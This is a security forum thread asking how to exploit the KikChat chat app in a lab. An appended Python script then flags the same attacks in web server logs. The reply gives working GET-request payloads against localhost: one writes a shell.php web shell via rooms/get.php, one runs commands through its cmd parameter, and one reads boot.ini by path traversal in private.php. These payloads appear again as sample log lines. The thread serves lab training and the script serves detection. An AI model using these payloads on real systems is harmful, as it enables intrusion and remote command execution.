KikChat LFI/RFI exploit code?



  • I've been reading about PWK-Example-Report-v1.pdf on pages 7-14 and found that KikChat apps were used in the example.

    https://www.exploit-db.com/exploits/30235

    Copy of the vulnerable app is available at exploit-db.

    However, the actual exploit code/script is no longer there.

    I was wondering what is the content of the exploit code above as I would like to reproduce a similar scenario in my lab.



  • As can be seen at the link you shared: https://www.exploit-db.com/exploits/30235

    The vulnerability can be directly exploited with simple GET requests, therefore elaborate exploits are not required.

    There is an RCE on /room/get.php and you need to replicate the following steps in order to create a file called shell.php that will be your web shell:

    1. Create the file called shell.php. This file will execute the command assigned to the "cmd" GET variable:

    http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=

    2. Access the file and get command execution using the "cmd" GET variable:

    http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;

    There is also an LFI on the /KikChat/private.php page on the name parameter:

    http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
    
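The two issues described in the answer above (a room name used as an on-disk file name under rooms/get.php, and an unsanitised name parameter in private.php) leave recognisable traces in the web server's access log. The following Python script is an added example, not code from the thread or from KikChat, that scans Apache-style combined log lines for the three patterns the answer walks through: an attempt to make get.php write a .php file, a request to the resulting file carrying a cmd parameter, and a traversal sequence in the private.php name parameter. The log lines are constructed for the example; the directory names (/rooms/get.php, /myroom/, /private.php) are taken from the URLs in the answer and treated as assumptions about the deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jan/2024:10:00:01 +0000] "GET /KikChat/rooms/get.php?name=shell.php&ROOM=x HTTP/1.1" 200 512
127.0.0.1 - - [10/Jan/2024:10:00:02 +0000] "GET /KikChat/myroom/shell.php?cmd=whoami HTTP/1.1" 200 34
127.0.0.1 - - [10/Jan/2024:10:00:03 +0000] "GET /KikChat/private.php?name=../../../../boot.ini HTTP/1.1" 200 210
127.0.0.1 - - [10/Jan/2024:10:00:04 +0000] "GET /KikChat/private.php?name=lobby HTTP/1.1" 200 1024
127.0.0.1 - - [10/Jan/2024:10:00:05 +0000] "GET /KikChat/rooms/get.php?name=general&ROOM=hello HTTP/1.1" 200 300
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# "../" or "..\" anywhere in a decoded parameter value.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def parse_line(line):
    """Return a dict with path and parsed query for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # keep_blank_values so an empty ROOM= still shows up as a key
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def decoded(value):
    """Decode twice so double-encoded sequences such as %252e%252e are also caught."""
    return unquote(unquote(value))


def classify(entry):
    """Return a list of finding labels for one parsed request (empty when nothing matches)."""
    findings = []
    path = entry["path"].lower()
    q = entry["query"]
    name = decoded(q.get("name", [""])[0])
    room = decoded(q.get("ROOM", [""])[0])

    # 1. get.php asked to create a file with a .php extension, or a ROOM value carrying PHP open tags.
    if path.endswith("/rooms/get.php"):
        if name.lower().endswith(".php") or "<?" in room:
            findings.append("room-file-write-attempt")

    # 2. private.php name parameter containing traversal or an absolute/drive-letter path.
    if path.endswith("/private.php"):
        if TRAVERSAL_RE.search(name) or name.startswith(("/", "\\")) or re.match(r"^[a-z]:", name, re.I):
            findings.append("lfi-attempt")

    # 3. A .php file under the room storage directory (assumed /myroom/) invoked with a cmd parameter.
    if path.endswith(".php") and "/myroom/" in path and "cmd" in q:
        findings.append("webshell-command")

    return findings


def scan(log_text):
    """Scan a block of log text; return (ip, path, finding) tuples in log order."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for finding in classify(entry):
            alerts.append((entry["ip"], entry["path"], finding))
    return alerts


if __name__ == "__main__":
    for ip, path, finding in scan(SAMPLE_LOG):
        print(f"{finding:25} {ip} {path}")
```

Run against the constructed sample, the first three lines produce one alert each and the two benign requests produce none. The rules are deliberately narrow to the paths named in the answer; on a real deployment you would point them at the actual room storage directory and add the same checks to any other endpoint that takes a file or room name.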
